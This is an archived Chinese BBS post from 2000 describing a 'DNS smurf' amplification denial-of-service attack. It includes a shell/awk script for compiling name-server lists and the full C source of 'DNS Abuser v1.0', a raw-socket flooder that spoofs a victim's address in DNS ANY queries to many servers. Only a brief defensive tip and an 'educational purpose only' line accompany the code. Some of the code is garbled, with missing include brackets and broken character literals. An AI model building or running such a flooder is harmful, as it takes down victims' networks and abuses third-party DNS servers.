📄 346.htm
字号:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center"> ● UNIX网络编程 (BM: clown) </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="309.htm">上一层</a>][<a href="347.htm">下一篇</a>]
<hr><p align="left"><small>发信人: Sargent (剑心), 信区: Security <br>
标 题: 警惕新的D.o.S方法 <br>
发信站: 武汉白云黄鹤站 (Fri Oct 6 02:50:19 2000), 站内信件 <br>
<br>
<br>
警惕新的D.o.S方法 2000-08-04 10:12 <br>
发布者:netbull 阅读次数:89 <br>
一种针对DNS服务器链的缺陷的报文放大技术可以使一个主机的带宽消耗殆尽。对于域名 <br>
服务器接收和转发外部DNS查询的功能,实际上存在先天缺陷,攻击者可以设法扩大请求 <br>
通信量,利用它来执行类似于 "smurf attack"的攻击,这种攻击对网络也能造成消耗大 <br>
量带宽的后果。我们把这种攻击称为 "DNS smurf"。这些DNS服务器一般是接受外部查询 <br>
请求的域名服务器,特别是那些转发查询或者重试次数过多的域名服务器(正常值为3次 <br>
,但一些服务器设置为超过20次)。 <br>
假设一个DNS查询在第一台DNS服务器上找不到记录,那么这台DNS服务器会把域名查 <br>
询转发给其它的DNS服务器。假设在一段区域内的DNS链中包含有多台DNS服务器,而且该 <br>
区域权威的DNS服务器也找不到能解析该域名的记录的话,那么这多台服务器都会向外面 <br>
发请求,这样请求报文的数量就会被放大若干倍。这种放大技术可以用来实现D.O.S(De <br>
nial Of Service)攻击,而且很有效。 <br>
下面程序通过发送欺骗的UDP数据包到一个名字服务器列表. <br>
查询的部分列表已经包含在这个源程序当中.可以自己定义查询列表以获得最大查询 <br>
率(目前为20-25)运行该程序有一个小小的延迟,因为必须通过名字服务器解析IP.然后就 <br>
会以全速发送UDP查询到自定义的名字服务器列表中的每一台服务器.名字服务器的名字 <br>
格式为每行一个. <br>
当下载了inaddr.zone.gz文件后,可以利用下面脚本快速建立一名字服务器列表. <br>
----------------------------------------------------- <br>
#!/bin/sh <br>
ZONE=inaddr.zone; <br>
if [ "x$1x" == "xx" ]; then <br>
echo "Usage: print_ns aprox_nr_of_servers"; <br>
exit <br>
fi <br>
if [ ! -f $ZONE ]; then <br>
echo "Zone file $ZONE not found"; <br>
exit <br>
fi <br>
NR=`wc -l $ZONE`; <br>
awk --assign=TOT="$NR" --assign=DES="$1" <br>
BEGIN { srand(); th=DES/TOT; }; <br>
/NS/ { if( rand() < th ) <br>
{ <br>
fi = split( $0, entry ); <br>
if( entry[fi-1] == "NS" ) <br>
serv[entry[fi]] = 1; <br>
}}; <br>
END { for( ns in serv ) <br>
printf "%s\n", ns; <br>
} $ZONE <br>
---------------------------------------------------- <br>
这种 DoS攻击比流行的smurf攻击有以下优势. <br>
1,可以列出25000或者更多的名字服务器入列表. <br>
2,几乎可以通过所有的防火墙系统.因为采用UDP查询,很难制定相应的过滤规则. <br>
3,因为没一台机器都需要一个名字解析服务器.唯一的解决办法就是拒绝所有的UDP数据 <br>
包从端口53流入,除了来自本地内部的机器.(小心别毁了自己用的名字服务器.) <br>
用法在linux下编译,gcc -o dnsa1 dnsa1.c <br>
运行格式:dnsa1 目标主机 0 [dns_server列表文件.txt [dns_query列表文件.txt]] <br>
攻击程序如下: <br>
/* <br>
* DNS Abuser v1.0 <br>
* Working version by Zelea <br>
* Last modified: 26 February 2000 <br>
* <br>
* Based on dnsabuser.c by Nemo (cveira@airtel.net) and <br>
* on DOOMDNS by FuSyS <br>
* <br>
* Usage: dnsa1 target times [dns_server.txt [dns_query.txt]] <br>
* times = 0 表示一直连续攻击 <br>
*/ <br>
*/ <br>
/* This program is for educational purpose only */ <br>
#include stdio.h <br>
#include string.h <br>
#include unistd.h <br>
#include stdlib.h <br>
#include sys/types.h <br>
#include sys/socket.h <br>
#include arpa/inet.h <br>
#include arpa/nameser.h <br>
#include netinet/in.h <br>
#include netinet/ip.h <br>
#include netinet/udp.h <br>
#include netdb.h <br>
#include time.h <br>
#define IP_HEAD_BASE 20 <br>
#define UDP_HEAD_BASE 8 <br>
#define DNS_QSIZE 64 <br>
#define MAX_LINE 255 <br>
#define MAX_QUERYS 255 // maximum buffer size <br>
#define MAX_SERVERS 255 // maximum buffer size <br>
#define QUERY_LENGTH 32 // max QUERY length <br>
#define DEF_DOMAINS "./dns_server.txt" // name servers <br>
#define DEF_QUERYS "./dns_query.txt" // query list file <br>
struct DNS_MSG <br>
{ <br>
HEADER head; <br>
char query[DNS_QSIZE]; <br>
}; <br>
struct dns_pkt <br>
{ <br>
struct iphdr ip; <br>
struct udphdr udp; <br>
char data[DNS_QSIZE]; <br>
}; <br>
char dns_query[MAX_QUERYS][QUERY_LENGTH]; <br>
char *dns_query_def[] = <br>
{ "ca", "de", "es", "ch", "be", "ie", "cr", "org", "com", "edu", <br>
"gov", "net", "se", "gr", "ro", "fr", "it", "ru", "pl", "ma", <br>
"in", "fi", "nrc.ca", "pse.pl", "arpa", "ucd.ie", "nl", "sk", <br>
"at", "psi.net", "uqam.ca", "ac.cy", "cz", "sh", "nu", <br>
"gmx.net", "ac.in", "usc.edu", "ac.uk", NULL }; <br>
unsigned long dns_servers[MAX_SERVERS]; <br>
unsigned long saddr; <br>
int sd; // <br>
int sd; // <br>
unsigned long <br>
nameResolve( const char *name ) <br>
{ <br>
struct hostent *host; <br>
struct sockaddr_in addr; <br>
memset( &addr, 0, sizeof( struct sockaddr_in ) ); <br>
addr.sin_family = AF_INET; <br>
addr.sin_addr.s_addr = inet_addr( name ); <br>
if ( addr.sin_addr.s_addr == -1 ) <br>
{ <br>
if ( ( host = gethostbyname( name ) ) == NULL ) <br>
{ <br>
fprintf( stderr, "Unable to resolve host %s\n", name ); <br>
return ( -1 ); <br>
} <br>
addr.sin_family = host->h_addrtype; <br>
memcpy( ( caddr_t ) & addr.sin_addr, host->h_addr, host->h_length ); <br>
} <br>
return ( unsigned long ) addr.sin_addr.s_addr; <br>
} <br>
void <br>
doomzone( void ) <br>
{ <br>
static int nsptr = 0; <br>
static int qptr = 0; <br>
unsigned long daddr; <br>
unsigned short psrc, pdest; <br>
struct sockaddr_in sin; <br>
struct dns_pkt dpk; <br>
struct DNS_MSG killer; <br>
int shoot, len; <br>
char *p, *plgt; <br>
if ( dns_servers[nsptr] == 0L ) <br>
nsptr = 0; <br>
daddr = dns_servers[nsptr++]; <br>
if ( *dns_query[qptr] == \ ) <br>
qptr = 0; <br>
psrc = htons( 1024 + ( rand( ) % 2000 ) ); <br>
pdest = htons( 53 ); <br>
// build packets ... <br>
memset( &killer, 0, sizeof( killer ) ); <br>
killer.head.id = getpid( ); <br>
killer.head.rd = 1; <br>
killer.head.aa = 0; <br>
killer.head.opcode = QUERY; <br>
killer.head.qr = 0; <br>
killer.head.qdcount = htons( 1 ); <br>
killer.head.ancount = htons( 0 ); <br>
killer.head.nscount = htons( 0 ); <br>
killer.head.arcount = htons( 0 ); <br>
strcat( killer.query + 1, dns_query[qptr++] ); <br>
p = plgt = killer.query; <br>
do <br>
{ <br>
p++; <br>
while ( *p != . && *p != \ ) <br>
p++; <br>
*plgt = ( u_char ) ( p - plgt - 1 ); <br>
plgt = p; <br>
} <br>
while ( *p == . ); <br>
p++; <br>
*(( unsigned short * ) p)++ = htons( T_ANY ); /* type ANY */ <br>
*(( unsigned short * ) p)++ = htons( C_IN ); /* class IN */ <br>
len = 12 + p - killer.query; <br>
memset( &dpk, 0, sizeof( dpk ) ); <br>
dpk.udp.source = psrc; <br>
dpk.udp.dest = pdest; <br>
dpk.udp.len = htons( UDP_HEAD_BASE + len ); <br>
memcpy( dpk.data, ( void * ) &killer, len ); <br>
dpk.ip.ihl = 5; <br>
dpk.ip.version = 4; <br>
dpk.ip.tos = 0; <br>
dpk.ip.tot_len = htons( IP_HEAD_BASE + UDP_HEAD_BASE + len ); <br>
dpk.ip.frag_off = 0; <br>
dpk.ip.ttl = 64; <br>
dpk.ip.protocol = IPPROTO_UDP; <br>
dpk.ip.saddr = saddr; <br>
dpk.ip.daddr = daddr; <br>
memset( &sin, 0, sizeof( sin ) ); <br>
sin.sin_family = AF_INET; <br>
sin.sin_port = pdest; <br>
sin.sin_addr.s_addr = daddr; <br>
shoot = sendto( sd, &dpk, <br>
( IP_HEAD_BASE + UDP_HEAD_BASE + len ), 0, <br>
( struct sockaddr * ) &sin, sizeof( sin ) ); <br>
if ( shoot < 0 ) <br>
fprintf( stderr, "SPOOF ERROR" ); <br>
} <br>
int <br>
main( int argc, char *argv[] ) <br>
{ <br>
FILE *dd, *qd; // file pointers <br>
int i, j, sd_opt; <br>
unsigned int times = 0; <br>
unsigned long ns_addr; <br>
char line[MAX_LINE]; <br>
char *p; <br>
// unbuffered output <br>
setbuf( stdout, NULL ); <br>
setbuf( stderr, NULL ); <br>
// ->simple<- parameter checking :P <br>
if ( argc < 3 ) <br>
{ <br>
fprintf( stderr, "\nUsage:\t%s target times " <br>
"[dns_servers.txt [dns_query.txt]]\n\n", argv[0] ); <br>
exit( 0 ); <br>
} <br>
saddr = nameResolve( argv[1] ); <br>
times = atoi( argv[2] ); <br>
// loading files <br>
dd = fopen( DEF_DOMAINS, "r" ); <br>
if ( argc > 3 ) <br>
{ <br>
if ( ( dd = fopen( argv[4], "r" ) ) == NULL ) <br>
{ <br>
fprintf( stderr, "\nCannot open domain file %s. Quitting...\n", argv[4] ); <br>
exit( 0 ); <br>
} <br>
} <br>
if ( argc > 4 ) <br>
{ <br>
if ( ( qd = fopen( argv[5], "r" ) ) == NULL ) <br>
{ <br>
fprintf( stderr, "\nCannot open query file %s. Quitting...\n", argv[5] ); <br>
exit( 0 ); <br>
} <br>
} <br>
else <br>
{ <br>
qd = fopen( DEF_QUERYS, "r" ); <br>
} <br>
} <br>
if ( dd == NULL ) <br>
{ <br>
fprintf( stderr, "\nCannot open domain file. Quitting...\n" ); <br>
exit( 0 ); <br>
} <br>
i = 0; <br>
do <br>
{ <br>
fgets( line, MAX_LINE - 1, dd ); <br>
if ( ( p = strchr( line, \n ) ) != NULL ) <br>
*p = \; <br>
if ( ( ns_addr = nameResolve( line ) ) != -1 ) <br>
dns_servers[i++] = ns_addr; <br>
} <br>
while ( ( i < MAX_SERVERS - 1 ) && !feof( dd ) ); <br>
dns_servers[i] = 0L; <br>
i = 0; <br>
j = 0; <br>
if ( qd == NULL ) <br>
{ <br>
while ( ( i < MAX_QUERYS - 1 ) && dns_query_def[j] != NULL ) <br>
{ <br>
{ <br>
if ( strlen( dns_query_def[j] ) < QUERY_LENGTH ) <br>
strcpy( dns_query[i++], dns_query_def[j++] ); <br>
else <br>
j++; <br>
} <br>
} <br>
else <br>
{ <br>
do <br>
{ <br>
fgets( line, MAX_LINE - 1, qd ); <br>
if ( ( p = strchr( line, \n ) ) != NULL ) <br>
*p = \; <br>
if ( strlen( line ) < QUERY_LENGTH ) <br>
strcpy( dns_query[i++], line ); <br>
} <br>
while ( ( i < MAX_QUERYS - 1 ) && !feof( qd ) ); <br>
} <br>
*dns_query[i] = \; <br>
fclose( dd ); <br>
fclose( qd ); <br>
// opening sockets ... <br>
srand( time( NULL ) ); <br>
sd_opt = 1; <br>
if ( ( sd = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) < 0 ) <br>
{ <br>
fprintf( stderr, "\nSocket error. Quitting...\n" ); <br>
exit( 0 ); <br>
} <br>
if ( setsockopt( sd, IPPROTO_IP, IP_HDRINCL, &sd_opt, <br>
sizeof( sd_opt ) ) < 0 ) <br>
{ <br>
fprintf( stderr, "\nIP Error. Quitting...\n" ); <br>
exit( 0 ); <br>
} <br>
printf( "\n\n\033[1;36mDNS Abuser v1.0\033[0m" ); <br>
printf( "\n\033[1;31mDNS-based flooder\033[0m" ); <br>
// flooding engine <br>
printf( "\n\033[1;32mFlooding %s:\033[0m\n", argv[1] ); <br>
i = 0; <br>
while ( times == 0 || i < times ) <br>
{ <br>
doomzone( ); <br>
i++; <br>
if ( !( i % 100 ) ) <br>
printf( "\033[0;32m.\033[0m" ); <br>
} <br>
printf( "\n\n" ); <br>
return ( 0 ); <br>
} <br>
iamafan@263.net <br>
-- <br>
</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="309.htm">上一层</a>][<a href="347.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -